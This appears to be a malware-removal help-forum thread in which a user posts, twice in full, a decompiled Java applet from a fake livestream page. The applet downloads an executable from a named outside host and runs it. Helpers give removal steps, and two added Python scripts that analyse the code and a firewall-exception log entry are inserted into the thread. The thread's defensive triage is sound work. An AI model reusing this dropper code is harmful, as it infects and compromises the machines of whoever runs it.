java virus

Oxide

1. My issues are:
I downloaded it, nothing has happened as of yet, and it is from the Java live stream

http://livestream-vids.com/1itemdbow

It makes you use a Java file, which I decompiled

Code:
import java.applet.Applet;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.net.URL;

public class Livestream extends Applet
{
  public static void startupAll()
  {
    try
    {
      String str1 = System.getenv("TMP");
      String str2 = "\\privzate.exe";
      String str3 = str1.concat(str2);
      URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");
      BufferedInputStream localBufferedInputStream = new BufferedInputStream(localURL.openStream());
      FileOutputStream localFileOutputStream = new FileOutputStream(str3);
      BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
      byte[] arrayOfByte = new byte[1024];
      int i = 0;
      while ((i = localBufferedInputStream.read(arrayOfByte, 0, 1024)) >= 0) {
        localBufferedOutputStream.write(arrayOfByte, 0, i);
      }
      localBufferedOutputStream.close();
      localBufferedInputStream.close();
      Runtime localRuntime = Runtime.getRuntime();
      Process localProcess = localRuntime.exec(str3);
    } catch (Exception localException) {
    }
  }

  public void init() {
    startupAll();
  }
  public void main(String[] paramArrayOfString) {
    startupAll();
  }
}

Pretty sure that is a virus

URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");

Especially when I went on ripaustin.org and it had a register thing to make an account, and it was a bot panel

2.My MBAM log:

3.My OTL log:
OTL
http://tinypaste.com/c45dad

EXTRAS

http://tinypaste.com/c1d33e
4.My GMER log:

http://tinypaste.com/e5403a

Issues encountered:

NONE YET!
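
A static triage pass over decompiled source like the applet posted above, as an added example that is not part of the original post: it flags the fetch, write-to-disk and execute steps and pulls out embedded URLs without running anything. The indicator names and regular expressions are this example's own heuristics, and the benign snippet is constructed for contrast.

```python
import re

# Heuristic indicators for a Java download-and-execute stub (names are this example's own).
INDICATORS = {
    "network_fetch": r"new\s+URL\s*\(|\.openStream\s*\(|\.openConnection\s*\(",
    "file_write": r"new\s+FileOutputStream\s*\(",
    "temp_or_profile_path": r'getenv\s*\(\s*"(?:TMP|TEMP|APPDATA)"|java\.io\.tmpdir',
    "executable_literal": r'"[^"\n]*\.(?:exe|scr|bat|cmd|dll)"',
    "process_exec": r"\.exec\s*\(|new\s+ProcessBuilder\s*\(",
    "swallowed_exception": r"catch\s*\([^)]*\)\s*\{\s*\}",
}
# The three behaviours that together make a dropper: fetch, write to disk, run.
CORE = {"network_fetch", "file_write", "process_exec"}


def triage(source: str) -> dict:
    """Return matched indicators, embedded URLs and a verdict for decompiled Java source."""
    hits = sorted(n for n, rx in INDICATORS.items() if re.search(rx, source))
    urls = re.findall(r'"(https?://[^"\s]+)"', source)
    verdict = "download-and-execute" if CORE <= set(hits) else "no dropper pattern"
    return {"indicators": hits, "urls": urls, "verdict": verdict}


# Constructed input: statements copied from the decompiled applet quoted in the post.
DROPPER = r'''
String str1 = System.getenv("TMP");
String str2 = "\\privzate.exe";
URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");
BufferedInputStream localBufferedInputStream = new BufferedInputStream(localURL.openStream());
FileOutputStream localFileOutputStream = new FileOutputStream(str3);
Runtime localRuntime = Runtime.getRuntime();
Process localProcess = localRuntime.exec(str3); } catch (Exception localException) {
}
'''
# Constructed benign counter-example: fetches a page but never writes or executes anything.
BENIGN = r'''
URL u = new URL("http://example.com/news.txt");
BufferedReader r = new BufferedReader(new InputStreamReader(u.openStream()));
System.out.println(r.readLine());
'''

if __name__ == "__main__":
    for name, src in (("applet", DROPPER), ("benign", BENIGN)):
        print(name, triage(src))
```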
 
Well, I did some sneaky detective work and decompiled the java file

Code:
import java.applet.Applet;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.net.URL;

public class Livestream extends Applet
{
  public static void startupAll()
  {
    try
    {
      String str1 = System.getenv("TMP");
      String str2 = "\\privzate.exe";
      String str3 = str1.concat(str2);
      URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");
      BufferedInputStream localBufferedInputStream = new BufferedInputStream(localURL.openStream());
      FileOutputStream localFileOutputStream = new FileOutputStream(str3);
      BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
      byte[] arrayOfByte = new byte[1024];
      int i = 0;
      while ((i = localBufferedInputStream.read(arrayOfByte, 0, 1024)) >= 0) {
        localBufferedOutputStream.write(arrayOfByte, 0, i);
      }
      localBufferedOutputStream.close();
      localBufferedInputStream.close();
      Runtime localRuntime = Runtime.getRuntime();
      Process localProcess = localRuntime.exec(str3);
    } catch (Exception localException) {
    }
  }

  public void init() {
    startupAll();
  }
  public void main(String[] paramArrayOfString) {
    startupAll();
  }
}


And from what I see, when I registered a username on ripaustin, it is a bot managing site and I've been added to it, I believe!

Posting a hijack log now
 
Go to start up, look for local.exe, delete it.
Restart your computer.
Look in startup, if it's still there give me your mbam log.

Also open up regedit and remove:

Code:
"C:\Users\Chris\AppData\Roaming\local.exe" = C:\Users\Chris\AppData\Roaming\local.exe:*:Enabled:Windows Messanger -- ()
"C:\Users\Chris\AppData\Roaming\local.exe" = C:\Users\Chris\AppData\Roaming\local.exe:*:Enabled:Windows Messanger -- ()

It will be in /authorized/


EDIT: If you are not on the team, do not post in check ups.
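
The firewall-exception line quoted in the reply above, read field by field, as an added example that is not part of the original thread: it parses log lines of that shape and lists why an entry deserves a closer look. The field layout (`path:scope:state:name -- (vendor)`) is inferred from the quoted line, and the directory list and second sample entry are assumptions constructed for the example.

```python
import re

# OTL-style line: "<path>" = <path>:<scope>:<state>:<display name> -- (<vendor>)
ENTRY = re.compile(r'^"(?P<key>[^"]+)"\s*=\s*(?P<value>.+?)\s+--\s+\((?P<vendor>.*)\)\s*$')
# Directories a standard user can write to; legitimate installers rarely put
# network-facing programs here. (This list is an assumption of the example.)
USER_WRITABLE = re.compile(r"\\(?:appdata|application data|temp|tmp|downloads)\\", re.I)


def parse_entry(line: str):
    """Split one exception line into its fields, or return None if it does not parse."""
    m = ENTRY.match(line.strip())
    if not m:
        return None
    # The path contains a drive colon, so take the three trailing fields from the right.
    parts = m["value"].rsplit(":", 3)
    if len(parts) != 4:
        return None
    path, scope, state, name = parts
    return {"path": path, "scope": scope, "state": state,
            "name": name, "vendor": m["vendor"].strip()}


def review(line: str):
    """Return the list of reasons an entry deserves a closer look (empty if none)."""
    e = parse_entry(line)
    if e is None:
        return ["unparsed"]
    reasons = []
    if USER_WRITABLE.search(e["path"]):
        reasons.append("executable in user-writable directory")
    if e["state"].lower() == "enabled" and e["scope"] == "*":
        reasons.append("enabled for any remote address")
    if not e["vendor"]:
        reasons.append("no vendor string")
    return reasons


# First line is the entry quoted in the post; the second is a constructed benign entry.
LINES = [
    r'"C:\Users\Chris\AppData\Roaming\local.exe" = C:\Users\Chris\AppData\Roaming\local.exe:*:Enabled:Windows Messanger -- ()',
    r'"C:\Program Files\Example\app.exe" = C:\Program Files\Example\app.exe:LocalSubNet:Enabled:Example App -- (Example Corp)',
]

if __name__ == "__main__":
    for entry_line in LINES:
        print(parse_entry(entry_line)["path"], "->", review(entry_line) or "ok")
```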
 
Be absolutely sure, because it could still be there.
 
Sorry for the delay, but would you like me to take one last look to be sure it is gone?
 
Are you all deaf? Stop posting in this thread unless you are A. On the team or B. OP
 